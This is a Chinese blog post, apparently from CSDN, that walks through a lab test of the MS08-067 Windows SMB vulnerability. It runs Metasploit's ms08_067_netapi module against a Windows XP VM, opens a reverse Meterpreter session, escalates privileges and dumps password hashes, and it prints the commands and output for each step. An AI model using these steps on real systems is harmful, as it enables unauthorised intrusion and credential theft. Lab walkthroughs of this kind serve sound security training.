MS08-067漏洞 远程溢出入侵测试

最新推荐文章于 2021-06-22 15:30:06 发布
最新推荐文章于 2021-06-22 15:30:06 发布
阅读量5.5k 收藏 8
点赞数
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32642039/article/details/79465503
版权

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程履行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击.
下面的实验为本地测试环境,一台Kali主机攻击机,一台Windows Xp靶机
Kali攻击机:192.168.34.220
windows Xp: 192.168.34.189

步骤一、启动postgresql

root@kali:~# /etc/init.d/postgresql restart
[ ok ] Restarting PostgreSQL 9.1 database server: main.
步骤二、启动metasploit
root@kali:~# /etc/init.d/metasploit restart
[ ok ] Stopping Metasploit worker: worker.
[ ok ] Stopping Metasploit web server: thin.
[ ok ] Stopping Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
root@kali:~# msfconsole

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! 
                 ;@'. __*__,."    |--- _____________/
                  '(.,...."/
Trouble managing data? List, sort, group, tag and search your pentest data
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
       =[ metasploit v4.11.4-2015071402                   ]
+ -- --=[ 1476 exploits - 931 auxiliary - 246 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

步骤三、查看数据连接状态

msf > db_status 
[*] postgresql connected to msf3

步骤四、启动nmap 扫描

msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.34.189
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-24 14:39 CST
[*] Nmap: Nmap scan report for 192.168.34.189
[*] Nmap: Host is up (0.0082s latency).
[*] Nmap: Not shown: 989 closed ports
[*] Nmap: PORT     STATE SERVICE         VERSION
[*] Nmap: 25/tcp   open  smtp            Microsoft ESMTP 6.0.2600.5512
[*] Nmap: 80/tcp   open  http            Microsoft IIS httpd 5.1
[*] Nmap: 135/tcp  open  msrpc           Microsoft Windows RPC
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 443/tcp  open  https?
[*] Nmap: 445/tcp  open  microsoft-ds    Microsoft Windows XP microsoft-ds
[*] Nmap: 777/tcp  open  multiling-http?
[*] Nmap: 1025/tcp open  msrpc           Microsoft Windows RPC
[*] Nmap: 6002/tcp open  http            SafeNet Sentinel License Monitor httpd 7.3
[*] Nmap: 7001/tcp open  afs3-callback?
[*] Nmap: 7002/tcp open  http            SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
[*] Nmap: SF-Port777-TCP:V=6.47%I=7%D=9/24%Time=56039AF6%P=x86_64-unknown-linux-gnu%
[*] Nmap: SF:r(Kerberos,5,"x01txe0x06")%r(SMBProgNeg,5,"x01txe0x06")%r(T
[*] Nmap: SF:erminalServer,A,"x01txe0x06x01txe0x06")%r(WMSRequest,5,"x0
[*] Nmap: SF:1txe0x06");
[*] Nmap: MAC Address: 00:0C:29:84:07:87 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: dh-ca8822ab9589; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: |   MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   Conficker: Likely CLEAN
[*] Nmap: |   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |   MS06-025: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |_  MS07-029: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 169.76 seconds

步骤五、搜索漏洞模块

msf > search ms08-067
Matching Modules
================
   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
步骤六、查看配置选项
msf exploit(ms08_067_netapi) > show options 
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

步骤七、配置参数

msf exploit(ms08_067_netapi) > set RHOST 192.168.34.189
RHOST => 192.168.34.189
msf exploit(ms08_067_netapi) > show options 
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.34.189   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > show options 
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.34.189   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
步骤八、开始利用
msf exploit(ms08_067_netapi) > exploit 
[*] Started reverse handler on 192.168.34.220:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.34.189
[*] Meterpreter session 1 opened (192.168.34.220:4444 -> 192.168.34.189:1059) at 2015-09-24 14:45:52 +0800
步骤九、成功返回shell ,meterpreter 的操作
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).hashdump 

meterpreter > hashdump 
Administrator:500:0182bd0bd4444bf8aad3b435b51404ee:328727b81ca05805a68ef26acb252039:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::meterpreter > shell 
Process 3368 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWSsystem32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . : 
        IP Address. . . . . . . . . . . . : 192.168.34.189
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.34.254
C:WINDOWSsystem32>net user
net user
User accounts for \
-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant            
IUSR_DH-CA8822AB9589     IWAM_DH-CA8822AB9589     SUPPORT_388945a0         
The command completed with one or more errors.

关于分享内容中的靶机,请百度搜索一下。

十月鱼
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试基础(四) MS08-067 漏洞攻击
Venus_majian
06-20 620
1. 漏洞介绍 2. 环境搭建 3. 渗透测试 4. 主机利用
远程堆栈溢出 原理篇
|游梦空间|
11-22 878
我们来研究windows系统下的远程溢出方法。 我们的目的是研究如何利用windows程序的溢出进行远程攻击。 如果对于windows下的缓冲区溢出不是很熟悉,请大家复习我前面的文章: 《window系统下的堆栈溢出》(NsfocusMagzine 20003)。 本文以及后续的《实战篇》都是建立在该文基础上的。 让我们从头开始。windows 2000 Advanced Server(Buil
信息系统安全实验(十):使用Metasploit渗透攻击MS08-067(Windows Server 2003 SP0)、Samba(Ubuntu 8.04)
agjirowjtg的博客
02-01 3431
这是信息系统安全实验系列的第十篇~ 一、实验概述 1.   实验目的        学习渗透测试(penetration)的相关知识,包括渗透测试的方法及其过程。学习Metasploit的基本知识,了解其基本的架构,并且能使用其基本的功能对靶机的已知漏洞进行利用。 2.   实验环境        Kali Linux以及其他靶机环境 3.   工具介绍        Metaspl...
Windows 远程溢出挖掘
weixin_30667649的博客
03-27 347
title: Windows 远程溢出挖掘 date: 2019-04-20 11:22:50 tags: 渗透测试 categories: 渗透测试 copyright: true --- 缓冲区溢出攻击很容易被攻击者利用,因为C/C++语言并没有自动检测缓冲区溢出操作,同时程序编写人员在编写代码时也很难始终检查缓冲区是否可能溢出.利用溢出,攻击者可以将期望数据写入漏洞程序内存中的任意位...
远程堆栈溢出 实战篇
|游梦空间|
11-22 681
下面是一个有问题的internet服务程序: /****************************************************************************/ /* server.cpp By Ipxodi */ #include #include char Buff[1024]; void overflow(char * s,int size) {
远程溢出实验
qq_43717119的博客
06-22 1871
远程溢出实验目的】 1、掌握远程溢出的基本原理; 2、掌握实现远程溢出的基本手段。 【实验环境】 同学A:运行server.exe 同学B:运行exploit.exe(命令格式:exploit.exe ipaddress 8888) 备注:同学A、B分别登录windows靶机,运行程序在D盘->攻防工具包->远程溢出实验预备知识点】 远程缓冲区溢出原理和本地缓冲区溢出原理一样,不同之处在于远程缓冲区溢出需要利用套接口进行远程连接。本小节通过一个例子来分析远程缓冲区溢出的工作原理和攻击过程
ms08-067溢出工具
05-20
【标题】"ms08-067溢出工具"涉及的是一个著名的Windows系统安全漏洞,该漏洞在2008年被发现并命名为MS08-067。这个漏洞主要存在于微软的Server Service服务中,允许远程攻击者通过精心构造的网络请求触发系统内存的...
MS08-067漏洞攻击全程演示(图解).
04-28
MS08-067漏洞源于Windows Server服务中远程过程调用(RPC)处理的错误实现。RPC是一个允许程序在不同的网络节点间交换信息的技术。在特定条件下,攻击者可以通过构造恶意的RPC请求,触发栈溢出,导致系统内存中的...
MS08-067的稳定利用方法源码
01-14
MS08-067漏洞详解】 MS08-067,全称为"Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability",是2008年微软发布的一个重大安全漏洞公告。这个漏洞影响了Windows XP、Windows ...
MS09-001漏洞利用程序-GUI
02-19
MS09-001是微软在2009年发布的一个关键安全更新,修复了一个存在于Windows操作系统中的远程代码执行漏洞。该漏洞主要影响Windows Server 2003、Windows XP、Windows Vista以及Windows Server 2008等版本。漏洞的根源...
ms8067漏洞溢出工具
10-28
【标题】"ms8067漏洞溢出工具"指的是针对MS08-067漏洞的利用工具,这是一个在Windows操作系统中广泛知名的漏洞。该工具通常被安全研究人员和黑客用于测试系统安全性或进行非法入侵。 【描述】提到这个工具“适合dos...
远程溢出工具
06-08
远程溢出工具非常好用的!应该会与很多人用到的。360会查。使用请关了360
MS08067漏洞溢出攻击
11-21
MS08067漏洞溢出攻击
远程溢出工具集合
07-08
远程溢出工具集合
Ms08-067 Exp 详细测试流程
|独自望海。。。
10-30 1843
Writed By 樱木花盗Blog:www.03389.comAdmin@03389.com首发暗组技术论坛http://www.darkst.com/bbs/thread-26874-1-1.html为了测试这个,我装了三个虚拟机。。。一两个XP一个2003,终于弄明白都需要哪些必要条件了,写出来和大家分享,希望对离成功还差一步的同学们有所帮助,感谢幻影的牛人放出MS08-067的Exp,
远程溢出攻击
野生码农
01-24 4572
网络安全介绍 https://wenku.baidu.com/view/df861fd101f69e3142329427.html   远程溢出攻击   什么是远程溢出攻击? https://zhidao.baidu.com/question/537606563.html   大多溢出攻击都是针对缓冲区的溢出。当缓冲区溢出时,过剩的信息对电脑内存中原有内容进行完全替换,如未进行备份...
ms08-067漏洞攻击实践
i_am_gaga的博客
07-12 604
Metasploit ms08_067漏洞攻击实践 环境准备 两台虚拟机,一台为kali,作为攻击机,一台为windows xp sp3 主机 IP kali 192.168.78.145 windows xp sp3 192.168.78.144 攻击实践 1.在kali终端打开msfconsole root@localhost:~# msfconsole 2.搜索相关插件 msf5 > search ms08_067 3.使用该漏洞模块 use exploit/win
linux远程溢出,linux-ftpd-ssl 远程溢出漏洞
weixin_39575047的博客
05-06 133
linux-ftpd-ssl 远程溢出漏洞2005-11-15eNet&Ciweek详细描述:linux-ftpd-ssl是一款支持加密的FTP server。linux-ftpd-ssl软件包中存在远程溢出漏洞,恶意服务器可能利用此漏洞在主机上执行任意指令。恶意服务器生成的超长响应命令可能会覆盖栈缓冲区。拥有创建可通过FTP访问目录的攻击者可以利用这个漏洞以root用户权限在本地机器上执...
通过一个远程溢出漏洞实现开后门的操作
weixin_44045581的博客
03-22 1022
通过一个远程溢出漏洞实现开后门的操作PCManFTP v2.0(CVE-2013-4730)漏洞分析1. 软件简介2. 漏洞成因3. 利用过程4.PoC PCManFTP v2.0(CVE-2013-4730)漏洞分析 软件名称:PCManFTP 软件版本:2.0 漏洞模块:PCManFTPD2.exe 模块版本:2.0.0.0 编译日期:2005-01-01 操作系统:Windows 7 漏洞编...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值